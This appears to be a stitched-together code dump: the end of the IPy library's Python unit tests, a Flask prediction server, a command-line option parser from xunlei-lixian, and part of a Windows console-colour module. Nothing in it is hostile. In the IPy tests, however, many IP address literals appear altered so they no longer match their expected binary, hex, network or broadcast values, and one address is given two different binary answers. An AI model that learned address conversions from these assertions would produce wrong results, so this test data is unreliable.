def testCheckNetmaskFail(self):
"""Illegal Netmasks should be rejected."""
self.assertRaises(ValueError, IPy._checkNetmask, 0xf0ffffff, 32)
self.assertRaises(ValueError, IPy._checkNetmask, 0xf0f0f0f0, 32)
self.assertRaises(ValueError, IPy._checkNetmask, 0xff00ff00, 32)
self.assertRaises(ValueError, IPy._checkNetmask, 0x70000001, 32)
self.assertRaises(ValueError, IPy._checkNetmask, 0xfffffff, 32)
def testCheckPrefixOk(self):
"""Legal IP/prefix combinations should check ok."""
self.assertTrue(IPy._checkPrefix(0x0, 32, 4))
self.assertTrue(IPy._checkPrefix(0xffffffff, 32, 4))
self.assertTrue(IPy._checkPrefix(0x7f000001, 32, 4))
self.assertTrue(IPy._checkPrefix(0x80000000, 1, 4))
self.assertTrue(IPy._checkPrefix(0x40000000, 2, 4))
self.assertTrue(IPy._checkPrefix(0x80000000, 3, 4))
self.assertTrue(IPy._checkPrefix(0x80000000, 4, 4))
self.assertTrue(IPy._checkPrefix(0xffffff00, 24, 4))
self.assertTrue(IPy._checkPrefix(0xffffff00, 24, 4))
self.assertTrue(IPy._checkPrefix(0xfffffff0, 28, 4))
self.assertTrue(IPy._checkPrefix(0x0, 32, 4))
self.assertTrue(IPy._checkPrefix(0x0, 1, 4))
self.assertTrue(IPy._checkPrefix(0x0, 0, 4))
self.assertTrue(IPy._checkPrefix(0xffffffffffffffff0000000000000000, 64, 6))
self.assertTrue(IPy._checkPrefix(0x0, 64, 6))
self.assertTrue(IPy._checkPrefix(0x0, 0, 6))
self.assertTrue(IPy._checkPrefix(0x0, 128, 6))
self.assertTrue(IPy._checkPrefix(0xffffffffffffffffffffffffffffffff, 128, 6))
def testCheckPrefixFail(self):
"""Illegal Prefixes should be catched."""
self.assertFalse(IPy._checkPrefix(0x7f000001, -1, 4))
self.assertFalse(IPy._checkPrefix(0x7f000001, 33, 4))
self.assertFalse(IPy._checkPrefix(0x7f000001, 24, 4))
self.assertFalse(IPy._checkPrefix(0x7f000001, 31, 4))
self.assertFalse(IPy._checkPrefix(0x7f000080, 24, 4))
self.assertFalse(IPy._checkPrefix(0x7f000100, 23, 4))
self.assertFalse(IPy._checkPrefix(0x7f000000, 1, 4))
self.assertFalse(IPy._checkPrefix(0x7f000000, 0, 4))
self.assertFalse(IPy._checkPrefix(0x1, -1, 6))
self.assertFalse(IPy._checkPrefix(0x1, 129, 6))
self.assertFalse(IPy._checkPrefix(0xffffffffffffffff0000000000000001, 64, 6))
self.assertFalse(IPy._checkPrefix(0xffffffffffffffff1000000000000000, 64, 6))
# TODO: _checkNetaddrWorksWithPrefixlen(net, prefixlen, version):
class PythonObjectBehaviour(unittest.TestCase):
def testIfUsuableAsDictionaryKey(self):
"""IP Object should be usable as dictionary key"""
d = {}
d[IPy.IP('127.0.0.1')] = 1
d[IPy.IP('2001::1')] = 1
d[IPy.IP('127.0.0.0/24')] = 1
d[IPy.IP('2001::/64')] = 1
def testIfCanBeInteratedOver(self):
"""It should be possible to iterate over an IP Object."""
i = 0
for x in IPy.IP('127.0.0.0/24'):
i += 1
self.assertEqual(i, 256, "iteration over a /24 should yield 256 values")
i = 0
for x in IPy.IP('2001::/124'):
i += 1
self.assertEqual(i, 16, "iteration over a /124 should yield 16 values")
def testIfComparesEqual(self):
"""nets of the same base and size should be considered equal, others not"""
a = IPy.IP('127.0.0.0/24')
a2 = a
b = IPy.IP('127.0.0.0/24')
c = IPy.IP('127.0.0.0/23')
d = IPy.IP('127.0.0.0/22')
e = IPy.IP('172.16.31.10/24')
self.assertEqual(a2, a)
self.assertEqual(a2, b)
self.assertEqual(a, a)
self.assertEqual(a, b)
self.assertNotEqual(a, c)
self.assertNotEqual(a, d)
self.assertNotEqual(a, e)
self.assertNotEqual(b, c)
self.assertNotEqual(b, d)
self.assertNotEqual(b, e)
self.assertNotEqual(c, d)
self.assertNotEqual(c, e)
self.assertNotEqual(d, e)
def testIfContainsInt(self):
"""__contains__() should work somewhat with ints"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(x.int() in ip)
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(x.int() in ip)
def testIfContainsStr(self):
"""__contains__() should work somewhat with strings"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(x.strNormal() in ip, "%r not in %r" % (x.strNormal(), ip))
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(x.strNormal() in ip, "%r not in %r" % (x.strNormal(), ip))
def testIfContainsIPobj(self):
"""__contains__() should work somewhat with IP instances"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(x in ip)
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(x in ip)
def testContainsVersionSeparation(self):
"""__contains__() should return false if versions mismatch"""
four = IPy.IP('192.168.0.0/16')
six = IPy.IP('::c0a8:0/112')
self.assertFalse(four in six)
self.assertFalse(six in four)
def testActingAsArray(self):
"""An IP-object should handle indices."""
ip = IPy.IP('127.0.0.0/24')
self.assertEqual(ip[0], ip.net())
self.assertEqual(ip[-1], ip.broadcast())
self.assertTrue(ip[255])
self.assertTrue(isinstance(ip[4::4], list))
self.assertRaises(IndexError, ip.__getitem__, 256)
def testStr(self):
"""string() should work somewhat with IP instances"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(str(x))
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(str(x))
def testRepr(self):
"""repr() should work somewhat with IP instances"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(repr(x))
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(repr(x))
def testLen(self):
"""object should have an working __len__() interface."""
self.assertEqual(len(IPy.IP('127.0.0.0/28')), 16)
self.assertEqual(len(IPy.IP('127.0.0.0/30')), 4)
self.assertEqual(len(IPy.IP('127.0.0.0/26')), 64)
self.assertEqual(len(IPy.IP('127.0.0.0/16')), 2**16)
# cmp
# IP[0xffffffff]
# IP + IP
# reverse
# netmsk
# ip
class IPobject(unittest.TestCase):
def testStrCompressed(self):
"""Compressed string Output."""
testValues = ['127.0.0.1',
'fc00:e968:6179::de52:7100',
'dead:beef::',
'dead:beef::/48',
'ff00:1::',
'ff00:0:f000::',
'0:0:1000::',
'::e000:0/112',
'::e001:0/112',
'dead:beef::/48',
'ff00:1::/64',
'ff00:0:f000::/64',
'0:0:1000::/64',
'::e000:0/112',
'::e001:0/112',
'::1:0:0:0:2',
'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'fc00:e968:6179::de52:7100',
'1:0:0:2::',
'fdf8:f53e:61e4::18',
'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b:0:0:3']
for question in testValues:
result = IPy.IP(question).strCompressed()
self.assertEqual(question, result, (question, result))
def testStrBin(self):
"""Binary string Output."""
testValues = [('0.0.0.0', '00000000000000000000000000000000'),
('0.0.0.1', '00000000000000000000000000000001'),
('255.255.255.255', '11111111111111111111111111111111'),
('172.16.31.10', '10000000000000000000000000000000'),
('::0', '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'),
('::1', '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'),
('ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff', '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'),
('5555:5555:5555:5555:5555:5555:5555:5555', '01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101'),
('aaaa:aaaa:aaaa:aaaa:aaaa:aaaa:aaaa:aaaa', '10101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010'),
('192.168.127.12', '01010101010101010101010101010101'),
('192.168.127.12', '10101010101010101010101010101010'),
('127.0.0.1', '01111111000000000000000000000001'),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:3', '00000000000000010000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000011')]
for (question, answer) in testValues:
result = IPy.IP(question).strBin()
self.assertEqual(answer, result, (question, answer, result))
def testStrNormal(self):
"""Normal string Output."""
testValues = [(338770000845734292534325025077361652240, 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b'),
(21932261930451111902915077091070067066, 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b'),
(338958331222012082418099330867817087043, 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b'),
(0, '0.0.0.0'),
(2130706433, '127.0.0.1'),
(4294967295, '255.255.255.255'),
(1, '0.0.0.1'),
(3588059479, '192.168.127.12')]
for (question, answer) in testValues:
result = IPy.IP(question).strNormal(question)
self.assertEqual(answer, result, (question, result, answer))
def testStrFullsize(self):
"""Normal / 0-padded string Output."""
testValues = [(338770000845734292534325025077361652240, 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b'),
(21932261930451111902915077091070067066, 'fdf8:f53e:61e4::18'),
(338958331222012082418099330867817087043, 'fdf8:f53e:61e4::18'),
(0, '0.0.0.0'),
(2130706433, '127.0.0.1'),
(4294967295, '255.255.255.255'),
(1, '0.0.0.1'),
(3588059479, '192.168.127.12')]
for (question, answer) in testValues:
result = IPy.IP(question).strFullsize(question)
self.assertEqual(answer, result, (question, result, answer))
def testStrHex(self):
"""Hex string Output."""
testValues = [(338770000845734292534325025077361652240, '0xfedcba9876543210fedcba9876543210'),
(21932261930451111902915077091070067066, '0x108000000000000000080800200c417a'),
(338958331222012082418099330867817087043, '0xff010000000000000000000000000043'),
(0, '0x0'),
(1, '0x1'),
(4294967295, '0xffffffff'),
(3588059479, '0xd5dd7157'),
(0x12345678, '0x12345678')]
for (question, answer) in testValues:
result = IPy.IP(question).strHex(question).lower()
self.assertEqual(answer, result, (question, result, answer))
def testStrDec(self):
"""Decimal string Output."""
testValues = [(338770000845734292534325025077361652240, '338770000845734292534325025077361652240'),
(21932261930451111902915077091070067066, '21932261930451111902915077091070067066'),
(338958331222012082418099330867817087043, '338958331222012082418099330867817087043'),
(0, '0'),
(1, '1'),
(0xFFFFFFFF, '4294967295'),
(0xD5DD7157, '3588059479')]
for (question, answer) in testValues:
result = IPy.IP(question).strDec(question)
self.assertEqual(answer, result, (question, result, answer))
def testNet(self):
"""Returning of the Network Address"""
self.assertEqual(str(IPy.IP("127.0.0.1").net()), "127.0.0.1")
self.assertEqual(str(IPy.IP("0.0.0.0/0").net()), "0.0.0.0")
self.assertEqual(str(IPy.IP("2001:1234:5678:1234::/64").net()), "2001:1234:5678:1234::")
def testBroadcast(self):
"""Returning of broadcast address."""
self.assertEqual(str(IPy.IP("127.0.0.1").broadcast()), "127.0.0.1")
self.assertEqual(str(IPy.IP("0.0.0.0/0").broadcast()), "255.255.255.255")
self.assertEqual(str(IPy.IP("2001:1234:5678:1234::/64").broadcast()), "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b")
def testStrNetmask(self):
"""StrNetmask should return netmasks"""
self.assertEqual(IPy.IP("0.0.0.0/0").strNetmask(), "0.0.0.0")
self.assertEqual(IPy.IP("0.0.0.0/32").strNetmask(), "255.255.255.255")
self.assertEqual(IPy.IP("127.0.0.0/24").strNetmask(), "255.255.255.0")
self.assertEqual(IPy.IP("2001:1234:5678:1234::/64").strNetmask(), "/64")
def testNetmask(self):
"""Netmask should return netmasks"""
self.assertEqual(str(IPy.IP("0.0.0.0/0").netmask()), "0.0.0.0")
self.assertEqual(str(IPy.IP("0.0.0.0/32").netmask()), "255.255.255.255")
self.assertEqual(str(IPy.IP("127.0.0.0/24").netmask()), "255.255.255.0")
self.assertEqual(str(IPy.IP("2001:1234:5678:1234::/64").netmask()), "ffff:ffff:ffff:ffff:0000:0000:0000:0000")
def testInt(self):
"""Prefixlen"""
self.assertEqual(IPy.IP("127.0.0.1").int(), 2130706433)
self.assertEqual(IPy.IP("0.0.0.0").int(), 0)
self.assertEqual(IPy.IP("255.255.255.255").int(), 0xffffffff)
self.assertEqual(IPy.IP("0000:0000:0000:0000:0000:0000:0000:0000").int(), 0)
self.assertEqual(IPy.IP("ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff").int(), 0xffffffffffffffffffffffffffffffff)
self.assertEqual(IPy.IP("fc00:db20:35b:7399::5").int(), 42540857391974671903776007410583339008)
def testPrefixlen(self):
"""Prefixlen"""
self.assertEqual(IPy.IP("127.0.0.1").prefixlen(), 32)
self.assertEqual(IPy.IP("::1").prefixlen(), 128)
self.assertEqual(IPy.IP("10.0.0.0/24").prefixlen(), 24)
self.assertEqual(IPy.IP("10.0.0.0-10.0.0.255").prefixlen(), 24)
self.assertEqual(IPy.IP("10.0.0.0/255.255.255.0").prefixlen(), 24)
self.assertEqual(IPy.IP("2001::/64").prefixlen(), 64)
def testVersion(self):
"""IP-version detection should work"""
self.assertEqual(IPy.IP("0.0.0.0/0").version(), 4)
self.assertEqual(IPy.IP("::1").version(), 6)
# TODO:
#def reverseNames(self):
#def reverseName(self):
#def __cmp__(self, other):
#def __add__(self, other):
#def _printPrefix(self, want):
def testOverlaps(self):
"""Overlapping Address Ranges."""
testValues = [('192.168.0.0/23', '192.168.1.0/24', 1),
('192.168.0.0/23', '192.168.0.0/20', 1),
('192.168.0.0/23', '192.168.2.0', 0),
('192.168.0.0/23', '172.16.31.10', 0),
('192.168.0.0/23', '192.168.0.0', 1),
('192.168.0.0/23', '192.168.1.255', 1),
('192.168.1.0/24', '192.168.0.0/23', -1),
('127.0.0.1', '127.0.0.1', 1),
('127.0.0.1', '127.0.0.2', 0)]
for (a, b, answer) in testValues:
result = IPy.IP(a).overlaps(b)
self.assertEqual(answer, result, (a, b, result, answer))
def testNetmask(self):
"""Normal string Output."""
testValues = [(338770000845734292534325025077361652240, '0xfedcba9876543210fedcba9876543210'),
(21932261930451111902915077091070067066, '0x108000000000000000080800200c417a'),
(338958331222012082418099330867817087043, '0xff010000000000000000000000000043'),
(0, '0x0'),
(1, '0x1'),
(4294967295, '0xffffffff'),
(3588059479, '0xd5dd7157')]
for (question, answer) in testValues:
result = IPy.IP(question).strHex(question).lower()
self.assertEqual(answer, result, (question, result, answer))
def testV46map(self):
four = IPy.IP('192.168.1.1')
six = IPy.IP('::ffff:192.168.1.1')
invalid = IPy.IP('2001::ffff:192.168.1.1')
self.assertEqual(four.v46map(), six)
self.assertEqual(four, six.v46map())
self.assertRaises(ValueError, invalid.v46map)
# TODO
#eval(repr(IPy))
# differences between IP and IPint
# I ported this checks to be sure that I don't have errors in my own checks.
class NetIPChecks(unittest.TestCase):
"""Checks taken from perls Net::IP"""
def testMisc(self):
ip = IPy.IP('195.114.80/24')
self.assertEqual(ip.int(), 3279048704)
self.assertEqual(ip.reverseName(),'80.114.195.in-addr.arpa.')
self.assertEqual(ip.strBin(),'11000011011100100101000000000000')
self.assertEqual(str(ip.net()),'192.168.3.11')
self.assertEqual(str(ip),'192.168.3.11/24')
self.assertEqual(ip.prefixlen(),24)
self.assertEqual(ip.version(),4)
self.assertEqual(ip.len(),256)
self.assertEqual(IPy._intToBin(ip.netmask().int()),'11111111111111111111111100000000')
self.assertEqual(ip.strNetmask(),'255.255.255.0')
self.assertEqual(ip.iptype(), 'PUBLIC')
self.assertEqual(ip.broadcast().strBin(),'11000011011100100101000011111111')
self.assertEqual(str(ip.broadcast()),'172.16.17.32')
ip = IPy.IP('202.31.4/24')
self.assertEqual(str(ip.net()),'172.16.31.10')
self.assertRaises(ValueError, IPy.IP, '172.16.17.32/2')
# because we are using integer representation we don't need a special "binadd"
ip = IPy.IP('172.16.58.3')
ip2 = IPy.IP('0.1.0.5')
self.assertEqual(str(IPy.IP(ip.int() + ip2.int())),'172.16.17.32')
#$T->ok_eq ($ip->binadd($ip2)->ip(),'172.16.17.32',$ip->error());
ip = IPy.IP('133.45.0/24')
ip2 = IPy.IP('133.45.1/24')
ip3 = IPy.IP('133.45.2/24')
self.assertEqual((ip + ip2).prefixlen(),23)
# Non-adjacent ranges
self.assertRaises(ValueError, IPy.IP.__add__, ip, ip3)
# Resulting invalid prefix
self.assertRaises(ValueError, IPy.IP.__add__, ip2, ip3)
ip2 = IPy.IP('192.168.3.11');
#$T->ok_eqnum ($ip->bincomp('gt',$ip2),1,$ip->error());
# this is something we can't do with IPy
#ip = IPy.IP('192.168.3.11-192.168.3.11');
#$T->ok_eq (($ip->find_prefixes())[3],'172.16.31.10/31',$ip->error());
ip = IPy.IP('192.168.127.12/22');
ip2 = IPy.IP('192.168.3.11/24');
#$T->ok_eqnum ($ip->overlaps($ip2),$IP_B_IN_A_OVERLAP,$ip->error());
ip = IPy.IP('dead:beef:0::/48')
self.assertEqual(str(ip.net()),'dead:beef::')
self.assertEqual(ip.int(), 295990755014133383690938178081940045824)
self.assertEqual(ip.strBin(),'11011110101011011011111011101111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')
self.assertEqual(ip.strCompressed(),'dead:beef::/48')
self.assertEqual(ip.prefixlen(), 48)
self.assertEqual(ip.version(), 6)
self.assertEqual(ip.strNetmask(),'/48')
self.assertEqual(str(ip.netmask()),'ffff:ffff:ffff::')
self.assertEqual(ip.iptype(),'RESERVED')
self.assertEqual(ip.reverseName(),'0.0.0.0.f.e.e.b.d.a.e.d.ip6.arpa.')
self.assertEqual(str(ip.broadcast()),'dead:beef:0:ffff:ffff:ffff:ffff:ffff')
ip = IPy.IP('202.31.4/24')
self.assertEqual(str(ip.net()),'172.16.31.10')
# TODO: fix this in IPy ... after rereading the RfC
# ip = IPy.IP(':1/128');
#$T->ok_eq ($ip->error(),'Invalid address :1 (starts with :)',$ip->error());
#$T->ok_eqnum ($ip->errno(),109,$ip->error());
ip = IPy.IP('ff00:0:f000::')
ip2 = IPy.IP('0:0:1000::')
self.assertEqual(IPy.IP(ip.int() + ip2.int()).strCompressed(), 'ff00:1::')
ip = IPy.IP('::e000:0/112')
ip2 = IPy.IP('::e001:0/112')
self.assertEqual(ip.__add__(ip2).prefixlen(),111)
self.assertEqual(ip.__add__(ip2).version(),6)
ip2 = IPy.IP('::dfff:ffff')
#$T->ok_eqnum ($ip->bincomp('gt',$ip2),1,$ip->error());
#ip = IPy.IP('::e000:0 - fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b')
#$T->ok_eq (($ip->find_prefixes())[2],'0000:0000:0000:0000:0000:0000:e002:0040/127',$ip->error());
ip = IPy.IP('ffff::/16')
ip2 = IPy.IP('8000::/16')
#$T->ok_eqnum ($ip->overlaps($ip2),$IP_NO_OVERLAP,$ip->error());
def timeout(func, args=(), kwargs={}, timeout_duration=1, default=None):
"""
ASPN recipe written by <NAME> to call a function with
a timeout using threads:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/473878
Small patch: add setDaemon(True) to allow Python to leave whereas the
thread is not done.
"""
class InterruptableThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.result = None
def run(self):
try:
self.result = func(*args, **kwargs)
except:
self.result = default
it = InterruptableThread()
it.setDaemon(True)
it.start()
it.join(timeout_duration)
if it.isAlive():
return default
else:
return it.result
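# Illustrative note (not part of the original suite): timeout() runs func in a
# daemon thread and falls back to default if the call does not finish within
# timeout_duration seconds; RegressionTest.testNulNetmask below relies on it:
#   timeout(IPy.IP, ["0.0.0.0/0.0.0.0"], timeout_duration=0.250, default=None)
# so a parse that hangs yields None instead of blocking the whole test run.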
class IPSetChecks(unittest.TestCase):
def setUp(self):
#array
self.a = [IPy.IP("192.168." + str(i) + ".0/24") for i in range(256)]
#range
self.r = IPy.IP('192.168.0.0/16')
#testing set
self.t = IPy.IPSet(self.a)
#control set
self.c = IPy.IPSet(self.a)
#Could otherwise look like 192.168.128.0/17
self.sixRange = IPy.IP('::c0a8:8000/113')
def testVersionSeparation(self):
#Don't remove a matching IPv6 subnet from an IPv4 list
self.assertRaises(KeyError, self.t.remove, self.sixRange)
self.t.add(self.sixRange)
self.assertNotEqual(self.t, self.c)
self.t.remove(self.sixRange)
self.t.discard(self.sixRange)
self.assertEqual(self.t, self.c)
def testContains(self):
self.assertTrue(IPy.IP('192.168.15.32/28') in self.t)
self.assertFalse(IPy.IP('172.16.31.10/28') in self.t)
class RegressionTest(unittest.TestCase):
def testNulNetmask(self):
ip = timeout(IPy.IP, ["0.0.0.0/0.0.0.0"], timeout_duration=0.250, default=None)
if ip:
text = str(ip)
else:
text = "*TIMEOUT*"
self.assertEqual(text, "0.0.0.0/0")
def testNonZeroType(self):
self.assertEqual(bool(IPy.IP("0.0.0.0/0")), True)
def testPrivate169(self):
"""
RFC 3330 indicates that 169.254.0.0/16 addresses are private.
They are automatically configured for links in the absence of other
information and should not be used on the internet
"""
self.assertEqual(IPy.IP("169.254.191.164").iptype(), "PRIVATE")
def testCheckAddrPrefixlenOn(self):
self.assertEqual(len(IPy.IP('192.168.0.0/24')), 256)
self.assertRaises(ValueError, IPy.IP, '192.168.1.0/42')
self.assertRaises(ValueError, IPy.IP, '172.30.1.0/22')
def testCheckAddrPrefixlenOff(self):
self.assertEqual(len(IPy.IP('192.168.0.0/24')), 256)
self.assertRaises(ValueError, IPy.IP, '192.168.1.0/42')
class TestConstructor(unittest.TestCase):
def testCheckAddrPrefixlenOff(self):
self.assertRaises(ValueError, IPy.IP, 0xffffffff + 1, ipversion=4)
self.assertRaises(ValueError, IPy.IP, 0xffffffffffffffffffffffffffffffff + 1, ipversion=6)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "1pyroaqua/docker-beginner",
"score": 3
} |
#### File: serve/code/serve.py
```python
import os
from flask import Flask
from flask import request
import pandas as pd
from sklearn import linear_model
import pickle
app = Flask(__name__)
@app.route('/ping')
def index():
return "true"
@app.route('/invocation', methods=['GET'])
def get_prediction():
feature1 = float(request.args.get('f1'))
feature2 = float(request.args.get('f2'))
feature3 = float(request.args.get('f3'))
loaded_model = pickle.load(open('model/model.pkl', 'rb'))
prediction = loaded_model.predict([[feature1, feature2, feature3]])
return str(prediction)
if __name__ == '__main__':
app.run(port=5000,host='0.0.0.0')
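# Usage sketch (assumption: port 5000 is reachable and model/model.pkl exists
# relative to the working directory; the commands below are illustrative, not
# from the repository):
#   curl http://localhost:5000/ping
#   curl "http://localhost:5000/invocation?f1=1.0&f2=2.0&f3=3.0"
# /ping answers "true" as a health check; /invocation returns the pickled
# model's prediction for the three query-string features parsed above.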
``` |
{
"source": "1py/xunlei-lixian",
"score": 3
} |
#### File: 1py/xunlei-lixian/lixian_cli_parser.py
```python
__all__ = ['expand_command_line', 'parse_command_line', 'Parser', 'command_line_parse', 'command_line_option', 'command_line_value', 'command_line_parser', 'with_parser']
def expand_windows_command_line(args):
from glob import glob
expanded = []
for x in args:
try:
xx = glob(x)
except:
xx = None
if xx:
expanded += xx
else:
expanded.append(x)
return expanded
def expand_command_line(args):
import platform
return expand_windows_command_line(args) if platform.system() == 'Windows' else args
def parse_command_line(args, keys=[], bools=[], alias={}, default={}, help=None):
args = expand_command_line(args)
options = {}
for k in keys:
options[k] = None
for k in bools:
options[k] = None
left = []
args = args[:]
while args:
x = args.pop(0)
if x == '--':
left.extend(args)
break
if x.startswith('-') and len(x) > 1:
k = x.lstrip('-')
if k in bools:
options[k] = True
elif k.startswith('no-') and k[3:] in bools:
options[k[3:]] = False
elif k in keys:
options[k] = args.pop(0)
elif '=' in k and k[:k.index('=')] in keys:
options[k[:k.index('=')]] = k[k.index('=')+1:]
elif k in alias:
k = alias[k]
if k in bools:
options[k] = True
else:
options[k] = args.pop(0)
elif '=' in k and k[:k.index('=')] in alias:
k, v = k[:k.index('=')], k[k.index('=')+1:]
k = alias[k]
if k not in keys:
raise RuntimeError('Invalid boolean option '+x)
options[k] = v
else:
if help:
print 'Unknown option ' + x
print
print help
exit(1)
else:
raise RuntimeError('Unknown option '+x)
else:
left.append(x)
for k in default:
if options[k] is None:
options[k] = default[k]
class Args(object):
def __init__(self, args, left):
self.__dict__['_args'] = args
self.__dict__['_left'] = left
def __getattr__(self, k):
v = self._args.get(k, None)
if v:
return v
if '_' in k:
return self._args.get(k.replace('_', '-'), None)
def __setattr__(self, k, v):
self._args[k] = v
def __getitem__(self, i):
if type(i) == int:
return self._left[i]
else:
return self._args[i]
def __setitem__(self, i, v):
if type(i) == int:
self._left[i] = v
else:
self._args[i] = v
def __len__(self):
return len(self._left)
def __str__(self):
return '<Args%s%s>' % (self._args, self._left)
return Args(options, left)
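# Illustrative example (hypothetical values, not part of the original module):
#   args = parse_command_line(['download', '--output', 'a.bin', '--continue', 'http://x'],
#                             keys=['output'], bools=['continue'])
# yields args.output == 'a.bin', args['continue'] is True, and the positional
# arguments are kept in order: args[0] == 'download', args[1] == 'http://x',
# len(args) == 2.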
class Stack:
def __init__(self, **args):
self.__dict__.update(args)
class Parser:
def __init__(self):
self.stack = []
def with_parser(self, parser):
self.stack.append(parser)
return self
def __call__(self, args, keys=[], bools=[], alias={}, default={}, help=None):
stack = Stack(keys=list(keys), bools=list(bools), alias=dict(alias), default=dict(default))
keys = []
bools = []
alias = {}
default = {}
for stack in [x.args_stack for x in self.stack] + [stack]:
keys += stack.keys
bools += stack.bools
alias.update(stack.alias)
default.update(stack.default)
args = parse_command_line(args, keys=keys, bools=bools, alias=alias, default=default, help=help)
for fn in self.stack:
new_args = fn(args)
if new_args:
args = new_args
return args
def command_line_parse(keys=[], bools=[], alias={}, default={}):
def wrapper(fn):
if hasattr(fn, 'args_stack'):
stack = fn.args_stack
stack.keys += keys
stack.bools += bools
stack.alias.update(alias)
stack.default.update(default)
else:
fn.args_stack = Stack(keys=list(keys), bools=list(bools), alias=dict(alias), default=dict(default))
return fn
return wrapper
def command_line_option(name, alias=None, default=None):
alias = {alias:name} if alias else {}
default = {name:default} if default is not None else {}
return command_line_parse(bools=[name], alias=alias, default=default)
def command_line_value(name, alias=None, default=None):
alias = {alias:name} if alias else {}
default = {name:default} if default else {}
return command_line_parse(keys=[name], alias=alias, default=default)
def command_line_parser(*args, **kwargs):
def wrapper(f):
parser = Parser()
for x in reversed(getattr(f, 'args_parsers', [])):
parser = parser.with_parser(x)
if hasattr(f, 'args_stack'):
def parse_no_body(args):
pass
parse_no_body.args_stack = f.args_stack
parser = parser.with_parser(parse_no_body)
import functools
@functools.wraps(f)
def parse(args_list):
return f(parser(args_list, *args, **kwargs))
return parse
return wrapper
def with_parser(parser):
def wrapper(f):
if hasattr(f, 'args_parsers'):
f.args_parsers.append(parser)
else:
f.args_parsers = [parser]
return f
return wrapper
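# Usage sketch (hypothetical subcommand, not from the original code base): the
# decorators above accumulate options on a single Parser, so a command can be
# declared and invoked roughly as follows:
#   @command_line_parser()
#   @command_line_option('verbose', alias='v')
#   @command_line_value('output', alias='o', default='out.bin')
#   def my_command(args):
#       if args.verbose:
#           print args.output
#   my_command(['--verbose', '-o', 'file.bin'])   # prints 'file.bin'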
```
#### File: 1py/xunlei-lixian/lixian_colors_win32.py
```python
__all__ = ['WinConsole']
from lixian_colors_console import Console
import ctypes
from ctypes import windll, byref, Structure
from ctypes.wintypes import SHORT, WORD
import sys
INVALID_HANDLE_VALUE = -1
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
class COORD(Structure):
_fields_ = (('X', SHORT),
('Y', SHORT),)
class SMALL_RECT(Structure):
_fields_ = (('Left', SHORT),
('Top', SHORT),
('Right', SHORT),
('Bottom', SHORT),)
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
_fields_ = (('dwSize', COORD),
('dwCursorPosition', COORD),
('wAttributes', WORD),
('srWindow', SMALL_RECT),
('dwMaximumWindowSize', COORD),)
def GetWinError():
code = ctypes.GetLastError()
message = ctypes.FormatError(code)
return '[Error %s] %s' % (code, message)
def GetStdHandle(handle):
h = windll.kernel32.GetStdHandle(handle)
if h == INVALID_HANDLE_VALUE:
raise OSError(GetWinError())
return h
def GetConsoleScreenBufferInfo(handle):
info = CONSOLE_SCREEN_BUFFER_INFO()
if not windll.kernel32.GetConsoleScreenBufferInfo(handle, byref(info)):
raise OSError(GetWinError())
return info
def SetConsoleTextAttribute(handle, attributes):
if not windll.Kernel32.SetConsoleTextAttribute(handle, attributes):
raise OSError(GetWinError())
FOREGROUND_BLUE = 0x0001
FOREGROUND_GREEN = 0x0002
FOREGROUND_RED = 0x0004
FOREGROUND_INTENSITY = 0x0008
BACKGROUND_BLUE = 0x0010
BACKGROUND_GREEN = 0x0020
BACKGROUND_RED = 0x0040
BACKGROUND_INTENSITY = 0x0080
COMMON_LVB_LEADING_BYTE = 0x0100
COMMON_LVB_TRAILING_BYTE = 0x0200
COMMON_LVB_GRID_HORIZONTAL = 0x0400
COMMON_LVB_GRID_LVERTICAL = 0x0800
COMMON_LVB_GRID_RVERTICAL = 0x1000
COMMON_LVB_REVERSE_VIDEO = 0x4000
COMMON_LVB_UNDERSCORE = 0x8000
colors = {
'black' : 0b000,
'blue' : 0b001,
'green' : 0b010,
'red' : 0b100,
'cyan' : 0b011,
'yellow' : 0b110,
'purple' : 0b101,
'magenta': 0b101,
'white' : 0b111,
}
def mix_styles(styles, attributes):
fg_color = -1
bg_color = -1
fg_bright = -1
bg_bright = -1
reverse = -1
underscore = -1
for style in styles:
if style == 0:
# reset mode
raise NotImplementedError()
elif style == 1:
# foreground bright on
fg_bright = 1
elif style == 2:
# both bright off
fg_bright = 0
bg_bright = 0
elif style == 4 or style == 'underline':
# Underscore
underscore = 1
elif style == 5:
# background bright on
bg_bright = 1
elif style == 7 or style == 'inverse':
# Reverse foreground and background attributes.
reverse = 1
elif style == 21 or style == 22:
# foreground bright off
fg_bright = 0
elif style == 24:
# Underscore: no
underscore = 0
elif style == 25:
# background bright off
bg_bright = 0
elif style == 27:
# Reverse: no
